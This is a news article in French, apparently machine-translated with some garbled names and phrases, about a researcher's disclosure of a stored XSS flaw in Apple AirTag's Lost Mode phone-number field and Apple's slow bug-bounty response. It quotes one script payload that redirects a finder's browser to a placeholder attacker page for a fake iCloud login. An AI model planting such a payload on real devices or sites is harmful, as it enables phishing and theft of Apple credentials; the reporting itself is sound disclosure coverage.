Les coups continuent de frapper la prime de bogue d’Apple, qui, selon les chercheurs en sécurité, est lente et incohérente à répondre à ses rapports de vulnérabilité.
cette fois , Follen aujourd’hui Cela est dû à un échec de la désinfection du champ de saisie de l’utilisateur – en particulier, le champ du numéro de téléphone que les propriétaires d’AirTag utilisent pour identifier leurs appareils perdus.
L’attaque du bon samaritain
Le consultant en sécurité et testeur d’intrusion Bobby Rauch a découvert qu’Apple AirTags— Les petits appareils qui peuvent être attachés à des objets fréquemment perdus, tels que des ordinateurs portables, des téléphones ou des clés de voiture, ne désinfectent pas les entrées de l’utilisateur. Cette omission ouvre la porte à l’utilisation des AirTags dans un fichier attaque de chute. Au lieu d’implanter dans la baie d’attente d’une cible des clés USB chargées de logiciels malveillants, un attaquant pourrait laisser tomber un AirTag conçu de manière malveillante.
Ce type d’attaque ne nécessite pas beaucoup de connaissances technologiques – l’attaquant écrit simplement un XSS valide dans le champ du numéro de téléphone de l’AirTag, puis met l’AirTag en mode Perdu et le dépose quelque part où la cible est susceptible de le trouver. En théorie, la numérisation d’un AirTag perdu est une procédure sûre – une page Web ne devrait apparaître qu’à l’adresse https://found.apple.com/. Le problème est found.apple.com Il intègre ensuite le contenu du champ du numéro de téléphone du site Web tel qu’il est affiché dans le navigateur de la victime, sans correction.
Rauch a expliqué que le moyen le plus évident d’exploiter cette vulnérabilité consiste à utiliser un simple XSS pour afficher une fausse boîte de dialogue de connexion iCloud sur le téléphone de la victime. Cela ne prend pas grand-chose du tout dans le code :
<script>window.location='https://path/to/badsite.tld/page.html';var a="";</script>si found.apple.com En incluant innocemment le XSS ci-dessus dans la réponse à l’AirTag scanné, la victime obtient une fenêtre contextuelle montrant le contenu de l’AirTag scanné. badside.tld/page.html. Il peut s’agir d’un exploit zero-day du navigateur ou simplement d’une boîte de dialogue de phishing. Rauch suppose qu’il existe une fausse boîte de dialogue de connexion iCloud, qui peut ressembler à la vraie chose – mais force à la place les informations d’identification Apple de la victime sur le serveur cible.
Bien qu’il s’agisse d’un exploit convaincant, ce n’est en aucun cas le seul disponible – tout ce que vous pouvez faire avec une page Web est sur la table et disponible. Cela va du simple hameçonnage, comme illustré dans l’exemple ci-dessus, à l’exposition du téléphone de la victime à une vulnérabilité dans le navigateur Ne pas cliquer.
Plus de détails techniques – et des vidéos simples montrant à la fois la vulnérabilité et l’activité du réseau résultant de l’exploit Rauch – sont accessibles au public sur Rauch divulgation en moyenne.
Ceci est la divulgation publique qu’Apple vous a apportée
Selon un rapport de Crêpes sur la sécurité, Rauch divulgue publiquement la vulnérabilité due à l’échec de la connexion Apple – un de plus en plus abonné refrain.
Rauch a déclaré à Krebs qu’il avait initialement divulgué la vulnérabilité en privé à Apple le 20 juin, mais pendant trois mois, toute l’entreprise lui a dit qu’elle « enquêtait toujours ». C’est une réponse étrange à ce qui semble être un bogue très simple à vérifier et à atténuer. Jeudi dernier, Apple a envoyé un e-mail à Rauch pour lui dire que la vulnérabilité sera corrigée dans une prochaine mise à jour, et lui a demandé de ne pas en parler publiquement entre-temps.
Apple n’a jamais répondu aux questions de base de Rauch, telles que s’il disposait d’un calendrier pour corriger le bogue, s’il prévoyait de l’évaluer pour le rapport et s’il pouvait prétendre à une prime. Le manque de communication de Cupertino a incité Rauch à partir général Sur Medium, malgré le fait qu’Apple demande aux chercheurs de garder le silence sur leurs découvertes s’ils veulent un crédit et/ou une compensation pour leur travail.
Rauch a exprimé sa volonté de travailler avec Apple, mais a demandé à la société de « fournir des détails sur le moment où vous prévoyez de résoudre ce problème et s’il y a eu une reconnaissance ou un paiement d’une récompense d’erreur ». Il a également averti la société qu’il prévoyait de publier dans 90 jours. Rauch dit que la réponse d’Apple a été « essentiellement, nous vous serions reconnaissants de ne pas divulguer cela ».
Nous avons contacté Apple pour commentaires et nous mettrons à jour ici avec toute réponse.
